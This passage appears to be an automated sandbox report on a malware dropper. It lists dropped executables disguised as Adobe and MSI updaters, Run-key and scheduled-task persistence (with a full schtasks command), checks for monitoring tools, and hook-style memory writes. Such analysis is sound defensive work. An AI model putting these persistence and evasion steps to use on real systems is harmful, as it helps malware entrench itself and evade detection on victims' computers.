Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\openh264.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File created: C:\Users\user\AppData\Local\AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV202.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\QtAVWidgets1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcr120.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-OPKFD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-ETDPI.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2804[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5OpenGL.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5WinExtras.dll (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlx[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cad54ba5b01423b1af8ec10ab5719d97[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	File created: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libcurl.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	File created: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp140_1.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\060[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5Svg.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-0CK56.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe	File created: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File created: C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\setup[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma2804[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\mousehelper.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\avdevice-58.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-1CATB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-G7OJ6.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File created: C:\Users\user\AppData\Local\Temp\heidiLgVUNbWj4Aw0\6JeTTVCBi2pYO9g7t24p.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-PT3AE.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Retailer_prog[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\123p[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-HBU3P.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe	File created: C:\ProgramData\DDEReadline 2.22.66\DDEReadline 2.22.66.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	File created: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	File created: C:\ProgramData\MPGPH131\MPGPH131.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File created: C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	File created: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV5
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f	Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Window searched: window name: RegmonClass

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk

Creates or modifies windows services

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV5
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV5

Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBGPQMHF"

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 2C50005 value: E9 2B BA 27 74	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 76ECBA30 value: E9 DA 45 D8 8B	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 2C60008 value: E9 8B 8E 2B 74	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 76F18E90 value: E9 80 71 D4 8B	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 2C80005 value: E9 8B 4D F7 72	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 75BF4D90 value: E9 7A B2 08 8D	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 2C90005 value: E9 EB EB F7 72	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 75C0EBF0 value: E9 1A 14 08 8D	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 2CA0005 value: E9 8B 8A 33 72	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 74FD8A90 value: E9 7A 75 CC 8D	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 2CB0005 value: E9 2B 02 35 72	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Memory written: PID: 7700 base: 75000230 value: E9 DA FD CA 8D	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 1170005 value: E9 2B BA D5 75
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 76ECBA30 value: E9 DA 45 2A 8A
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 11D0008 value: E9 8B 8E D4 75
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 76F18E90 value: E9 80 71 2B 8A
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 11F0005 value: E9 8B 4D A0 74
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 75BF4D90 value: E9 7A B2 5F 8B
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 1200005 value: E9 EB EB A0 74
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 75C0EBF0 value: E9 1A 14 5F 8B
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 1210005 value: E9 8B 8A DC 73
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 74FD8A90 value: E9 7A 75 23 8C
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 2D90005 value: E9 2B 02 27 72
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Memory written: PID: 7776 base: 75000230 value: E9 DA FD D8 8D
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Memory written: PID: 7792 base: 1990005 value: E9 8B 2F 57 75
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Memory written: PID: 7792 base: 76F02F90 value: E9 7A D0 A8 8A
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Memory written: PID: 7808 base: 7FFE22370008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Memory written: PID: 7808 base: 7FFE2220D9F0 value: E9 20 26 16 00
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 12E0005 value: E9 2B BA BE 75
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 76ECBA30 value: E9 DA 45 41 8A
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 12F0008 value: E9 8B 8E C2 75
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 76F18E90 value: E9 80 71 3D 8A
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 1310005 value: E9 8B 4D 8E 74
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 75BF4D90 value: E9 7A B2 71 8B
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 1320005 value: E9 EB EB 8E 74
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 75C0EBF0 value: E9 1A 14 71 8B
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 1330005 value: E9 8B 8A CA 73
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 74FD8A90 value: E9 7A 75 35 8C
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 1450005 value: E9 2B 02 BB 73
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Memory written: PID: 7824 base: 75000230 value: E9 DA FD 44 8C

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Code function: 7_2_00481A30 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_00481A30

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
